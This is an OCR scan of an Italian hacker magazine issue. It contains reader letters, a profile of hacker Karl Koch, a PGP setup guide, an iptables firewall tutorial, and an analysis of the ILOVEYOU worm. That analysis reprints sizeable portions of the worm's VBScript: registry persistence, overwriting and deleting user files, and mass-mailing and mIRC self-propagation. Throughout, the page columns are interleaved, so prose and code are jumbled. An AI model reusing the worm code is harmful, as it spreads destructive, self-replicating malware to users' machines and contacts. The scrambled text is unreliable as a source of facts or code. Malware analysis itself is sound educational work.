Ciao a tutti e... COMPLIMENTI !!!
..:: VIRUSED2 ::..
by

by
e

Qualcuno sente la mancanza dei teschi?

www.spysystem.it

Vorrei mettere il link


www.s0ftpj.org del mio sito su HAC-
Butchered form Inside (BFi per KER JOURNAL.
gli amici) è una storica ezine ita- Il mio sito parla di si-
liana. Il livello qualitativo è mol-
to elevato, sia sul piano tecnico,
curezza, perché per
sia su quello editoriale: anche la essere al sicuro devi
lettura di articoli su argomenti prima conoscere le
tecnici e tutto sommato noiosi, si tecniche hacker.
può rivelare molto divertente.
Ultimamente ha fatto parlare Grazie 1000
molto di sé per la pubblicazione
di articoli sul funzionamento
Non sono forse due
della rete Fastweb, completi di
programmi per superare alcuni modi di vedere la
limiti tecnici del provider a larga stessa cosa?
banda.

10 | www.hackerjournal.it
e
lat :
g na siti a
Se tri @
e l.it
os on
i v d a z i urna
r e e r jo
ck
ha

siti; scegliete voi se tirarvela o vergognarvi I classici


della Rete

http://virgolamobile.50megs.com/
www.wizard4.cjb.net http://solitaireknight.supereva.it hacker-howto-it.html
Se cercate info su dove recuperare
exploit, crack e seriali, avete sba-
Ciao, Vi sarei grato se pubblicaste il link del gliato indirizzo. Se invece volete
diventare "davvero" un hacker,
volevo chiedervi se po- mio sito, un sito dove poter trovare di tut- questa guida scritta da Eric S. Rey-
tevate inserire nella ri- to, e quello che non c'è basta chiederlo. mond è il posto giusto da cui parti-
re. L'indirizzo qui sopra si riferisce
vista il link al mio sito. Tabbo80 alla sua traduzione italiana (c'è co-
Grazie! munque il link all'originale inglese
per chi lo preferisce). Tra le altre
Ciao by Posso chiedere anche una margherita e
cose degne di nota scritte o curate
wizard4 una media chiara? da Eric, ci sono senz'altro il Jargon
File e The Cathedral and the Ba-
zaar. Ci arrivate dalla sua home
page: www.tuxedo.org/~esr

Il tuo sito su
hackerjournal.it
È attiva la sezione link del nostro
sito: se hai un sito dedicato
all'hacking o alla tecnologia in
generale, puoi aggiungerlo alla
nostra directory, che è in continua
crescita.
La pagina con il modulo da
compilare per l'inserimento è
a l l ' i n d i r i z z o
www.hackerjournal.it/Links/Links.htm
Fai clic su "Aggiuni un sito" e
www.lupin3rd.org compila il modulo in ogni sua
parte.

Ecco il sito che voglio segnalare a tutti i costi.


Matrox

Per il costo possiamo senz'altro metterci d'accordo.


Però... quel sondaggio sul miglior film riguardante l'hacking io
da qualche parte l'ho già visto. Mah?

www.hackerjournal.it |11
personaggio

HACKER STORY

CURIOSITA’
U n numero misterioso,
anarchico: il 23. Karl
Kock è morto il 23.5
Mistero 23 Ci sono tutti gli elementi del giallo nella storia
all’età di 23 anni. Tutti i più
grandi anarchici sono morti il di Karl Koch, l’hacker tedesco morto in
giorno 23, come scrisse “Der circostanze misteriose...
Spiegel”. Quel numero attirò

U
molto Karl, nel suo studio sulle
cospirazioni. Pensò ad esempio n Pc, una linea telefonica, un ge-
all’omicidio del primo ministro nio dei computer un po’ sbanda-
svedese Olof Palme, avvenuto una to, la sua morte misteriosa. Ci so-
sera alle 23 e 23. L’idea ultima no proprio tutti gli ingredienti del
che aveva Karl era che tutti giallo nella storia di Karl Koch, l’-
noi, senza saperlo, serviamo gli hacker tedesco morto bruciato nella sua
scopi degli Illuminati. Il auto il 23 maggio del 1989, pochi giorni
numero 23 proviene proprio dal prima di deporre in tribunale per una storia
romanzo di Robert Anton Wilson ancora tutta da comprendere. Koch, genio ri-
diventato un cult per l’hacker belle, infanzia difficile e adolescenza fatta di
tedesco, e il 23 si ritrovò nel spinelli e coca, del computer ha fatto la sua
racconto (23 Skidoo!) dello vita. E, forse, proprio per il computer, l’ha
scrittore Burroughs, amico di persa.
Wilson. Burroughs, una volta,
raccontò di aver conosciuto un >> Giochi pericolosi
marittimo che navigava da 23
anni e che si vantava di non
aver mai avuto incidenti: quello Quando le sue azioni di hackeraggio l’han-
stesso giorno il traghetto su no spinto a infilarsi nelle reti informatiche sta-
cui viaggiava questo marittimo tunitensi, inizialmente solo per gioco, le cose
affondò. Alla sera Burroughs si sono fatte più grosse di lui, di Pengo e di
accese la radio per quel gruppo di aderenti al Chaos Com-
ascoltare tutte puter Club. Sì, perché in una Germa-
le notizie sulla nia alle prese con la caduta del
vicenda e muro di Berlino, questo gruppo di
k23, la storia dell’hacker Karl Koch
ascoltò un’altra giovanissimi hackers decise di
è il libro di Hans-Christian Schmid
notizia: un aereo porre all’attenzione del Kgb tutto
e Michael Gutmann scritto sulla
era precipitato il materiale raccolto. Materiale im-
vicenda del giovane hacker tede-
sulla rotta New portante? Probabilmente no. Ma la
sco morto il 23 maggio del 1989.
York – Miami: il storia di Koch non può comunque
Da queste pagine è stato tratto
volo era registrato non affascinare. L’innamoramento
anche il film “23”, interamente
col numero 23! E nei confronti di Hagbard Celine, fi-
dedicato al mondo hacker. Il libro
ancora: il 23.5.1949 gura centrale del romanzo Gli Illu-
è edito dalla ShaKe edizioni
entrò in vigore la minati!, non è semplicemente il vo-
Underground (viale Bligny 42 –
costituzione della ler cercare una figura di mitizzare a
Milano).
Repubblica federale tutti i costi. Ha solo 14 anni, Karl, quando
Tedesca in vigore fino al legge un romanzo regalatogli forse per sba- riano dalla giurisprudenza all’ingegneria”.
23.5.1999. E lo sapete che il glio dal padre alcolista. Gli Illuminati so- Sceglie di fare il pirata, Hagbard, viaggiando
23.5 vennero uccisi Bonnie & no una potente congregazione segre- sul suo sottomarino dorato. Si avvale della
Clyde e il magistrato Giovanni ta che tenta di provocare la terza collaborazione di un computer (Fuckup) che
Falcone? Infine, il giorno guerra mondiale; Hagbard Celine tenta calcola senza sosta il destino del mondo. Un
dell’inizio delle riprese di 23, di combatterli. “Lui è un folle genio – ricorda personaggio affascinante. Che lo accompa-
morì Borroughs. Un numero, un spesso Karl – altamente qualificato, in grado gnerà nella sua crescita. In pochi anni Karl
destino. di esercitare tutta una serie di attività che va- perde la mamma e il papà. Proprio con l’ere-

12 | www.hackerjournal.it
di hackeraggio si fanno sempre più frequen- rentemente inaccessibile diventa, in realtà,
ti. Quando parte l’azione di hacking al cen- facile da “scardinare”. Gli hacker escono
tro di ricerca nucleare Fermilab di Chicago, piano piano allo scoperto, anche con lo sco-
Hagbard è in primissima linea. L’Fbi lo sco- po di gettare lontane le accuse di essere solo
pre, ma non ci sono prove e il vuoto legislati- dei criminali: durante la fiera informatica Ce-
vo fa il resto, per una materia legale ancora bit di Hannover, così, Hagbard ha un volto
tutta da scoprire. La banca dati Optimis del anche per i giornalisti: si mette alla scrivania,
Pentagono, poi, diventa l’obiettivo preferito davanti a un computer, e inizia a violare la li-
degli hacker, ma Karl pensa ad altro: il nea delle poste tedesche, scruta i dati dell’U-
Norad, ovvero il centro di controllo niversità di Caltec, in California. I giornali ini-
dità del padre compra un computer potente strategico per la difesa aerea degli ziano a concentrarsi sempre più sulle vicende
che gli permette, finalmente, “di entrare nel Usa. Vuole entrare nel sistema proprio come di questa dozzina di hackers tedeschi capaci
modo giusto nella scena dei computer”. nel film War Games. Scopre l’accesso e in di entrare anche nel computer centrale della
Un’entrata forte, sconvolgente. Karl passa le accordo con l’hacker Urmel, decide di… la- Nasa. E quando a qualcuno viene in
sue notti davanti al monitor, la mattina ci so- sciar perdere. “Sarebbero stati guai”. mente di rivolgersi ai servizi segreti
no montagne di carta vicino alla stampante. russi, il gioco dura poco. Arrivano i soldi
Si nutre di caffè e succhi multivitamini- >> Una missione per Karl, Pengo, Dob e Pedro, ma arrivano
ci, fuma sigarette e dall’hashish è anche i guai. Karl finisce in un angolo, sem-
passato a droghe più pesanti. Il pavi- pre più isolato. Viene costantemente pedina-
mento è un tappeto di dischetti e ma- Ma le lunghe notti trascorse davanti al com- to dai servizi segreti dell’Est e naufraga nei
trici per incidere schede. Che cosa stava puter convincono Karl di una cosa: ha una suoi pensieri sugli Illuminati. Cerca di riemer-
facendo? A che cosa stava lavorando quel missione personale nell’imminente gere, cerca soldi, cerca di trovare lo scoop
Karl Koch, a un passo dalla maggiore età, guerra informatica tra le potenze per giornalisti pronti a tutto… Trova soltanto
diventato ormai nel mondo degli informatici mondiali. Un’idea, questa, maturata e cor- la morte. Suicidio, scrivono sui documenti uf-
semplicemente “Hagbard”? Gli atti eroici roborata dai successi nell’hacking notturno, ficiali. L’hanno suicidato, dice qualcuno.
degli hacker americani ormai sono ben noti quando ogni calcolatore che sembra appa- Fine di un hacker. Sbandato, ma geniale. K
anche in Germania e nell’84 nasce il Chaos
Computer Club. Con quale scopo? “Effet-

RIFERIMENTI
http://www.hagbard-celine.de/
http://www.decoder.it
http://www.shake.it
http://www.mtr.webconcept.de/D/
KarlKoch.html
http://www.ccc.de/

tuare servizi di pattuglia ai margini dell’irri-


conoscibile, sensibilizzando l’opinione pub-
blica sul problema della sicurezza dei dati…
comportandosi in modo offensivo ma ami-
chevole, sottolineando come gli hacker mo-
strino proprio i punti deboli nel settore della
sicurezza”. Scrive Karl in un’autobiografia:
“Con un paio di eccezioni, vivo nell’isola-
mento del mio ambiente e della mia cerchia
di amicizie. Le sessioni di hackeraggio dura-
no giorni e notti. Comunico, nella maggior
parte dei casi, tramite il computer… Dedico
il mio tempo solo al computer”. Le sessioni

13 | www.hackerjournal.it
VIRUS

SVISCERATO, STRINGA PER STRINGA, IL VIRUS PIÙ FAMOSO

I segreti del virus


I Love You
Il mese di maggio del 2000 è stato - informaticamente -
segnato dalla comparsa del virus "I Love You", questo
si propagava per e-mail sotto forma di allegato.
Con un nome così accattivante, furono numerose le vittime a
cadere nel tranello. Scopriamo oggi i segreti
sul funzionamento di uno dei virus più famosi del mondo...

I
Love You è un programma scritto in Visual Basic
Script, linguaggio prossimo a Visual Basic. Il virus è Le due prime righe del code source corrispondono al-
contenuto in una cartella chiamata "Love Letter for la firma degli autori del virus, firma che dall'inizio ha
you.txtx.vbs". Di primo acchito questa doppia esten- fatto pensare che il virus provenisse dalle filippine.
sione può essere molto vistosa, ma al contrario,
questa permette di attrarre l'attenzione delle vittime.
Di sistema, Windows nasconde le estensioni conosciute. Vbs è >> Diffusione del virus nel nostro
un'estensione riconosciuta da Windows ed eseguibile con sistema
Wscript.exe. Il nome del file virus appare solo con il nome di
"Love letter for you.txt", ciò può portare a pensare che si tratti
unicamente di un file di testo classico. L'avrete capito, in caso Set dirwin = fso.GetSpecialFolder(0)
di apertura di questo file, non sarà il bloc-notes ad essere lan- Set dirsystem = fso.GetSpecialFolder(1)
ciato, ma Wscript.exe eseguendo il virus. Parecchie conse- Set dirtemp = fso.GetSpecialFolder(2)
guenze seguono l'esecuzione di questo virus. Innanzitutto al- Set c = fso.GetFile(WScript.ScriptFullNa-
cuni dati nel database vengono modificati permettendo così al me)
virus di essere lanciato ad ogni avvio del vostro computer; di c.Copy(dirsystem&"\MSKernel32.vbs")
seguito alcuni parametri di Internet Explorer per facilitare la c.Copy(dirwin&"\Win32DLL.vbs")
proliferazione di un cavallo di troia. Ma il più grave problema, c.Copy(dirsystem&"\LOVE-LETTER-FOR-
che spiega la enorme diffusione del virus, è che durante l'ese- YOU.TXT.vbs")
cuzione viene automaticamente rispedito come allegato (così [...]
come l'abbiamo ricevuto) ai contatti della nostra rubrica di
Outlook. Così senza nemmeno saperlo, non solo infettate il Grazie a questa sintassi il virus è copiato in diversi file come:
vostro computer, ma contribuite a propagarlo. Infine questo vi-
rus è stato diffuso tramite IRC, vale a dire una rete di chat. C:\Windows\System\MSKernel32.vbs
Scopriamo assieme una parte del code source di questo virus C:\Windows\System\Win32DLL.vbs
con il fine di capire meglio come funziona e come il virus I Lo- C:\Windows\System\ LOVE-LETTER-FOR-
ve You abbia potuto diffondersi così facilmente. YOU.TXT.vbs

sub regruns()
>> Firma degli autori On Error Resume Next
Dim num,downread
rem barok -loveletter(vbe) regcreate
rem by: spyder / ispyder@mail.com / "HKEY_LOCAL_MACHINE\Software\Microsoft\Win
@GRAMMERSoft Group / dows\CurrentVersion\Run\MSKernel32
Manila,Philippines ",dirsystem&"\MSKernel32.vbs"
[...] regcreate

14 | www.hackerjournal.it
>>
"HKEY_LOCAL_MACHINE\Software\Microsoft\Win
dows\CurrentVersion\RunServices\Wi

L’AUTORE
n32DLL",dirwin&"\Win32DLL.vbs" Espressione impaurita, tracce di acne sul
downread="" viso, scarpe da ginnastica tipo rapper:
downread=regget("HKEY_CURRENT_USER\Softwa- così il ventitreenne filippino Onel De
re\Microsoft\Internet Guzman appare improvvisamente
Explorer\Download Directory") di fronte all'opinione pubblica
if (downread="") then internazionale a pochi giorni
downread="c:\" dall'esplosione del virus I love you. Le
end if accuse a suo carico sono pesanti: è ritenuto responsabile di
[...] aver creato e immesso in Rete il virus informatico più dannoso
mai creato. Orfano di padre, sua madre è proprietaria di una
piccola flotta di pescherecci.
>> Infezione dei file con il virus Appassionato di computer fin da bambino, era uno dei
migliori studenti dell'Ama, una catena di college
informatici molto popolare nel Sud-Est asiatico. Lì entrò a far
parte di un gruppo chiamato Grammersoft. Si tratta di giovani
In più, la procedura regruns infetta la base dei registri con il fine di talento accomunati dalla passione per i computer e dalla
di eseguire ad ogni avviodel vostro PC. Notiamo che altre modi- voglia di farsi largo come programmatori.
fiche vengono fatte al database, come quella che permette il Sarà proprio quel fatidico nome, inserito
download automatico del cavallo di troia con l'intento di infetta- probabilmente per vezzo e ritrovato all'interno dello
re il computer. script di I love you, a convogliare i sospetti su di lui.
Nonostante le prove schiaccianti a suo carico e la richiesta di
if (ext="vbs") or (ext="vbe") then estradizione negli Stati Uniti dell'Fbi, non è mai stato
set ap=fso.OpenTextFile(f1.path,2,true) incriminato perché nelle Filippine, al momento del
ap.write vbscopy fatto, mancava una legge sulla pirateria informatica.
ap.close De Guzman, che nel mondo degli hacker, e per molti
ragazzi filippini, è ormai un Robin Hood che si batte per un
Così il computer cancella i file che contengono l'estensione Internet "democratico" e soprattutto gratuito, si è sempre
.vbs e .vbe dichiarato innocente, rinfocolando i dubbi legali
legati ai crimini informatici.
elseif(ext="js") or (ext="jse") or Tutto ciò mentre nel mondo serpeggiano i timori sulla
(ext="css") or (ext="wsh") or (ext="sct") debolezza della Rete, sempre più centrale nelle economie
or (ext="hta") then occidentali, attaccabile persino da intraprendenti studenti di
set ap=fso.OpenTextFile(f1.path,2,true) paesi in via di sviluppo.
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path) elseif(ext="mp3") or (ext="mp2") then
set cop=fso.GetFile(f1.path) set mp3=fso.CreateTextFile(f1.path&".vbs")
cop.copy(folderspec&"\"&bname&".vbs") mp3.write vbscopy
fso.DeleteFile(f1.path) mp3.close
set att=fso.GetFile(f1.path)
succede la stessa cosa ai file con esten- att.attributes=att.attributes+2
sione .js, .jse, .css, .wsh, .sct, e end if
.hta, vengono eliminati e sostituiti da
file con estensione .vbs la stessa sorte tocca ai file .mp3 e .mp2

elseif(ext="jpg") or (ext="jpeg") then if (eq<>folderspec) then


set ap=fso.OpenTextFile(f1.path,2,true) if (s="mirc32.exe") or (s="mlink32.exe")
ap.write vbscopy or (s="mirc.ini") or
ap.close (s="script.ini") or (s="mirc.hlp") then
set cop=fso.GetFile(f1.path) set scriptini=fso.CreateTextFile(folder-
cop.copy(f1.path&".vbs") spec&"\script.ini")
fso.DeleteFile(f1.path) scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
idem per i file con estensione .jpg e scriptini.WriteLine "; Please dont edit
.jpeg che sono cancellati e rimpiazzati this script... mIRC will corrupt,
da file con lo stesso nome ma aventi l'e- if mIRC will"
stensione .vbs scriptini.WriteLine " corrupt... WINDOWS
will affect and will not run

www.hackerjournal.it | 15
Virus

SVISCERATO, STRINGA PER STRINGA, IL VIRUS PIÙ FAMOSO

correctly. thanks" "&malead,1,"REG_DWORD"


scriptini.WriteLine ";" end if
scriptini.WriteLine ";Khaled Mardam-Bey" x=x+1
scriptini.WriteLine ";http://www.mirc.com" next
scriptini.WriteLine ";" regedit.RegWrite
scriptini.WriteLine "n0=on 1:JOIN:#:{" "HKEY_CURRENT_USER\Software\Microsoft\WAB\
scriptini.WriteLine "n1= /if ( $nick == "&a,a.AddressEntries.Count
$me ) { halt }" else
scriptini.WriteLine "n2= /.dcc send $nick regedit.RegWrite
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" "HKEY_CURRENT_USER\Software\Microsoft\WAB\
scriptini.WriteLine "n3=}" "&a,a.AddressEntries.Count
scriptini.close end if
eq=folderspec next
end if Set out=Nothing
end if Set mapi=Nothing
next end sub
end sub
La sintassi qui sopra permette semplicemente di creare il messag-
Il virus I love You testa infine il nostro computer per verificare la gio e-mail contenente il virus e di spedirlo a tutti i membri della
presenza del programma Mirc, che permette di accedere alle chat vostra rubrica. Ci accorgiamo inoltre che il soggetto che contiene
Irc. Se è così il virus si servirà di questo programma con il fine di il virus è "I Love You", che il corpo del messaggio, vale a dire il te-
propagarsi ad altri utenti. sto è "kindly check the attacched loveletter coming from me". L'a-
vrete capito, questo messaggio personale che chiede al nostro
corrispondente di aprire la lettera d'amore in allegato, è destina-
>> Prooagazione del virus attraverso to ad attirare la curiosità dei nostri corrispondenti con il fine di
Outlook spingerli ad aprire l'allegato. Infine, il file source del virus (love let-
ter for you.txt.vbs) viene aggiunto come allegato nelle mail invia-
te ai vostri corrispondenti.
x=1 Nel code source del file contenente il virus I Love You una proce-
regv=regedit.RegRead("HKEY_CURRENT_USER\So dura genera automaticamente una pagina HTML che sarà tra-
ftware\Microsoft\WAB\"&a) smessa ai nostri corrispondenti via IRC. Questa pagina HTML con-
if (regv="") then tiene un ActiveX (vbscript) con il fine di richiamare l'attenzione del-
regv=1 la vittima. La sintassi seguente permette di far defilare un testo.
end if
if (int(a.AddressEntries.Count)>int(regv))
then >> Diffusione del virus Via IRC
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad="" sub html
regad=regedit.RegRead("HKEY_CURRENT_USER\S On Error Resume Next
oftware\Microsoft\WAB\"&malead) dim
if (regad="") then lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,d
t6
In questa parte del code source del virus, possiamo confermare dta1="<HTML><HEAD><TITLE>LOVELETTER -
che il virus richiama l'applicazione Wab.exe. se lanciate l'applica- HTML<?-?TITLE><META
zione dal menù Start\Esegui potrete rendervi conto che si tratta di NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS
una rubrica di Outlook. Come abbiamo già detto il virus si tra- - LOVELETTER@-@>"&vbcrlf& _
smette automaticamente a tutti i contatti che fanno parte della no- "<META NAME=@-@Author@-@ CONTENT=@-@spyder
stra rubrica, senza che ce ne si accorga neppure. ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines
set male=out.CreateItem(0) ?-? March 2000@-@>"&vbcrlf& _
male.Recipients.Add(malead) "<META NAME=@-@Description@-@ CONTENT=@-
male.Subject = "ILOVEYOU" @simple but i think this is
male.Body = vbcrlf&"kindly check the atta- good...@-@>"&vbcrlf& _
ched LOVELETTER coming from me." "<?-?HEAD><BODY
male.Attachments.Add(dirsystem&"\LOVE-LET- ONMOUSEOUT=@-@window.name=#-#main#-#;win-
TER-FOR-YOU.TXT.vbs") dow.open(#-#LOVE-LETTER-FOR-YOU.HTM#
male.Send -#,#-#main#-#)@-@ "&vbcrlf& _
regedit.RegWrite "ONKEYDOWN=@-@window.name=#-#main#-#;win-
"HKEY_CURRENT_USER\Software\Microsoft\WAB\ dow.open(#-#LOVE-LETTER-FOR-YOU.HTM#

16 | www.hackerjournal.it
privacy

COME INSTALLARE E USARE PGP, IL PIÙ FAMOSO PROGRAMMA DI CRITTOGRAFIA

Tenete i dati al riparo


Lasciate perdere le decine di softwarini che promettono di cifrare i vostri documenti:

elettronica, tanto per fare l'esempio


più banale (ma anche quando
chattiamo in ICQ, o inviamo files a
qualcuno), dovrebbe essere,
soprattutto per chi si interessa a tutte
le problematiche relative alla
sicurezza, una pratica comune. Il
diritto e la necessità di avere una
buona privacy vanno al di là del
contenuto dei dati che decidiamo di
criptare: ovvero, non è necessario
avere “qualcosa da nascondere” per
usare software come PGP; come
saggiamente afferma Zimmermann, è
figlia del buon senso comune la
necessità di avere la propria privacy a
portata di mano. Lasciando per un
attimo da parte queste riflessioni sulla

P

GP permette alla
gente comune di
avere la propria
privacy a portata di
mano.
C’è un bisogno sociale crescente di
questo. Ecco perché l’ho creato." queste
le parole di Philip Zimmermann, il
padre di PGP. Che cos'è PGP? PGP sta
per Pretty Good Privacy, ed è un
software sviluppato nel 1991,
appunto, da Philip Zimmermann, che
consente di criptare mediante un
sistema di chiavi qualsiasi tipo di dato,
in modo da garantire la privacy, per
esempio, nello scambio di
informazioni via email o quant'altro.
PGP esiste ormai in molte varianti ed il
suo utilizzo è diffusissimo: criptare i
dati che ci scambiamo quando
inviamo e riceviamo messaggi di posta

?
GPG Sebbene i sorgenti siano li-
beramente disponibili, PGP è una
proprietà intellettuale. Esiste però
una versione completamente libe-
ra, chiamata GPG, e pubblicata
sotto licenza GPL (www.gnupg.org).

18| www.hackerjournal.it
>>

da occhi indiscreti
l’unico vero programma che merita considerazione è Pretty Good Privacy

privacy, andiamo a vedere come essere presi in considerazione (schede di


mettere in pratica il tutto: ci rete e/o modem):
occuperemo di PGP sotto Windows, A questo punto il wizard avvierà l'installa-
della sua installazione e del suo zione vera e propria del software. Sarà poi
utilizzo nel lavoro quotidiano. Iniziamo il momento di creare le nostre chiavi (quel-
con lo scaricare PGP per Windows, per le che, come già detto, ci consentiranno ef-
esempio da qui: fettivamente di criptare i dati): ci verrà chie-
http://www.pgpi.org/products/pgp/ver- sta una identità (nome ed email) e una
sions/freeware/ pass-phrase, ovvero una frase che il soft-
In questo sito (che è quello del progetto in- ware utilizzerà per generare le chiavi. La
ternazionale PGP) potremo trovare anche frase deve essere sufficientemente comples-
altre numerose implementazioni di PGP,
nonchè versioni diverse del software per derà adesso di specificare quali componen-
numerosi utilizzi e numerosi sistemi operati- ti e quali plugin desideriamo installare.
vi. Il pacchetto per Windows 2000 pesa cir- Lasciamo pure selezionate le voci preimpo-
ca 7 mega: una volta ultimato il download state. I vari Plugin risultano molto utili in
ci troveremo di fronte al solito file .zip nel quanto integrano PGP in altrettante appli-
quale si trova il programma. Lanciando l'in-
stallazione, la prima cosa che ci verrà chie-
sta sarà se siamo nuovi utenti o se posse-
diamo già un “mazzo di chiavi” da impor-
tare.

>> Chiavi digitali sa. Al termine, dopo il solito riavvio della


macchina, potremo notare che tra le icone
Le chiavi PGP non sono altro che una serie tray della nostra barra degli strumenti sarà
di dati utilizzati per criptare e decriptare le comparsa anche quella relativa a PGP:
informazioni: se per esempio avessimo già Cliccandoci sopra con il tasto destro potre-
le nostre “chiavi” da usare per decriptare i mo selezionare tutti i vari tools di PGP, con-
nostri vecchi documenti, dovremo specifi- figurarne le opzioni o andare a lavorare
carlo qui in modo da poterle utilizzare. PGP cazioni comuni, come Outlook, ICQ o Eu- con le nostre chiavi, aggiungere utenti etc...
dora, in modo da rendere semplicissimo, A questo punto PGP è correttamente instal-
per esempio, l'invio di email criptate: in pra- lato sul nostro pc: andando in giro per il
tica vi troverete nella barra dei bottoni del nostro disco fisso e cliccando con il tasto
vostro client di posta anche quelli relativi a destro del mouse su un qualsiasi file potre-
PGP, e ciò vi solleverà dal dover fare tutto a mo notare l'integrazione di PGP con il siste-
mano. Nel passo successivo ci verrà chiesto ma operativo.
quali dispositivi di comunicazione devono

>> Conviene usarlo!


lavora con una coppia di chiavi, una pub-
blica, liberamente distribuibile per permet-
tere ad altri di inviarci materiale cifrato, e Una volta che ci si è “fatta la mano”, usare
l’altra privata, da custodire gelosamente e PGP sarà abbastanza semplice, e decisa-
da non rivelare mai a nessuno. mente consigliabile. È il migliore strumento
Supponiamo di essere nuovi utenti e andia- per proteggere i nostri documenti da occhi
mo avanti: il wizard di installazione ci chie- indiscreti, che purtroppo affollano la rete. K

www.hackerjournal.it |19
LINUX

IMPLEMENTAZIONE DI UN FIREWALL SU LINUX CON IPTABLES

Teniamo fuori gli intrusi


Nella maggior parte delle installazioni Linux è già presente la funzionalità di
firewall. Scoprite con noi come è possibile configurare il sistema per rifiutare
i pacchetti sgraditi.

L inux contiene il suppor-


to per instradamento e
filtro dei pacchetti di re-
te, che vengono utiliz-
zati tramite IpTables e IP Chains.
Ip Chains è più vecchio rispetto a
iptables: se avete un kernel prece-
ficare intestazioni IP
tramite IpTables, af-
finché raggiungano la
rete Internet.
Per fare ciò, IpTables
manda i pacchetti al
kernel al fine di elabo-
dente al 2.2, sarete costretti a usa- rarli. Il masheramento
re IPChains; se invece avete delle sfrutta il servizio NAT
distribuzioni del kernel superiori che consente di usare
(la 2.4 è la versione più stabile), un indirizzo IP per più
IpTables è la scelta giusta. Que- sistemi. Questo servi-
st’ultimo software infatti supporta zio, basato su Up-
in più il mascheramento e i filtri di chains, non è compati-
pacchetto (dalla 2.3, NetFilter). bile con con i client
I pacchetti che attraverseranno il VPN che utilizzano
firewall vengono conforntati con le PPTP.
tabelle di ipTables; se un pacchet- Creare una tabella con
to corriosponde a certe regole tutte le regole può es-
(dette anche ACL, da Access Con- sere un rompicapo, so-
trol List), il pacchetto verrà elabo- pratutto se si utilizza-
rato di conseguenza. no reti molto estese.
Per la massima protezione, si con- Per questo, con in Ip-
siglia anche di installare un siste- Tables a volte basta
ma di identificazione delle intru- assegnare delle regole
sioni (IDS, di cui parleremo in se- di default e modificarle a proprio Bisognerebbe anche bloccare tutto
guito). Linux permette di inoltrare piacimento. il traffico in entrata a meno che
Per creare un filtro ai pacchetti in non faccia parte di una connessio-
>> Configurazione del uscita (proveniente dall’interno) è ne già aperta.
consigliabile negare tutti gli acces- In ipchains si utilizza l’opzione -y e
firewall come filtro si e in seguito accettare quelli che -SYN in modo che il firewall re-
servono a un determinato servizio. spinga i pacchetti con il flag SYN
pacchetti IP, cosa che consente di Per esempio, se A (computer inter- impostato, invece i pacchetti con il
configurarlo come un router. Se no) deve accedere a un servizio bit FIN o ACK vengono accettati
avete un computer con un indiriz- http su un server Web dall’altra perchè fanno parte di una sessio-
zo di rete interna, questo compu- parte del computer B (Firewall), il ne già aperta.
ter non potrà uscire su internet computer B dovrà lasciare aperta Un’altra cosa molto importante è
perchè avrà un IP che è riservato la porta 80 e 443 (per l’http) abilitare la registrazione dei pac-
alle reti locali. I pacchetti entrano Per creare invece le regole per i chetti. Con IPchains si utilizza il
da una scheda Ethernet vengono pacchetti in entrata è consigliabile parametro -l, con iptables -j LOG
tradotti e immessi su Internet con bloccare tutto il traffico ICMP al fi- (destinazione).
l’IP del router o del firewall con- ne di evitare gli attacchi DoS, ma Per poter usufruire del firewall a
nesso a internet. Questo tipo di questo potrebbe complicare la ri- piene prestazioni è necessario im-
firewall è detto server proxy. È soluzione dei problemi per una re- postare le opzioni Network Packet
inoltre possibile inoltrare o modi- te molto ampia. Filtering nella sezione NEtWorking

www.hackerjournal.it |20
>>
nei kernel fino alla 2.2. Nelle suc- due tipi differenti di catene rispet- per esempio, una per la rete in-
cessive versioni invece dovrebbero to a Filter: terna e una per la rete esterna. Se
esserci le opzioni: Network Fire- PREROUTING : modifica i pacchet- non si specifica un interfaccia di
wall, TCP/IP networking e IP ac- ti che tentano di entrare nell’inter- rete, verrà usata la prima (per es
counting. faccia eth0).
Quest’ultima opzione (IP accoun- POSTROUING : modifica i pacchet- In un sistema con due schede que-
ting) è necessaria per raccogliere i ti quando lasciano l’host (in uscita) sta opzione è necessaria perchè in
dati sui pacchetti e quindi permet- Passiamo alla parte pratica. Per una rete si può voler bloccare tut-
te di ottenere informazioni sull’uso stabilire quali regole applicare, to il traffico TCP in entrata dalla
della rete. Per questo scopo il se- rete ma si vuol accettarlo in usci-
ta. Per tale scopo si utilizza l’op-
>> Azioni delle catene e zione -i per specificare l’interfac-
Come si installa? programmazzione cia:
I pacchetti IPchains e iptables
delle regole
iptables -A INPUT - i eth0 -s 0/0 -
solitamente vengono montati
naturalmente si deve prima deli- d 0/0 -protocl icmp-type echo-
dalle più diffuse distribuzioni nel
neare un profilo della rete, e que- reply -j REJECT
momento dell’installazione di
sta è forse la parte più complica- iptables -A INPUT - i eth1 -s 0/0 -
Linux. Se così non fosse, proba-
ta. I comandi sono semplici e so- d 0/0 -protocl icmp-type echo-
bilmente dovrete ricompilare il
pratutto pochi, ma la cosa più reply -j REJECT
kernek per includere anche
difficile è sapere esattamente che
queste opzioni.
fine deve fare ogni pacchetto, al Questo comando consente tutto il
fine di evitare spiacevoli errori traffico ICMP su una rete, ma non
guente file deve essere nella direc- nel programmare le regole che li inoltra con un pacchetto echo-
tory /proc provocano le intrusioni informati- reply (addio ping).
/proc/net/ip_acct. Se il file esiste, che. Le azioni più utilizzate sono Un’altra cosa importante: le politi-
vuol dire ke il kernel supporta già DROP e ACCEPT che sono impostate di default su
la funzione per il filtro di pacchetti. Vi conviene quindi creare una ca- Accept, ma sarebbe preferibile

Passiamo ora alle tabelle e alle Tabella Catene Predefinite Descrizione


catene. Iptables utilizza delle ta-
belle predefinite che interagiscono filter INPUT FORWARD Filtra i pachetti
con le interfacce del sistema e ge- Nat PREROUTING OUTPUT POSTROUTING Abilita Mascheramento
stiscono i pacchetti di conseguen-
Mangle PREROUTING OUTPUT POSTROUTIN Galtera i pacchetti
za.
Le catene sono delle regole che
utilizza iptables. Come si può ve- tena personalizzata e modifcarla prima impostare tutto su Drop, e
dere nel riquadro “Le tabelle di poi a vostro piacimento, così: poi impostare solo quello che vi
iptables”, questo programma uti- serve su Accept. In questo modo i
lizza tre tabelle: NAT, Mangle e iptables -N custom iterà di menticare qualche porta
Filter. iptables usa la tabella Flter iptables -A custom -s 0/0 -d 0/0 - aperta.
per filtrare i pacchetti e la tabella, p icmp -j DROP
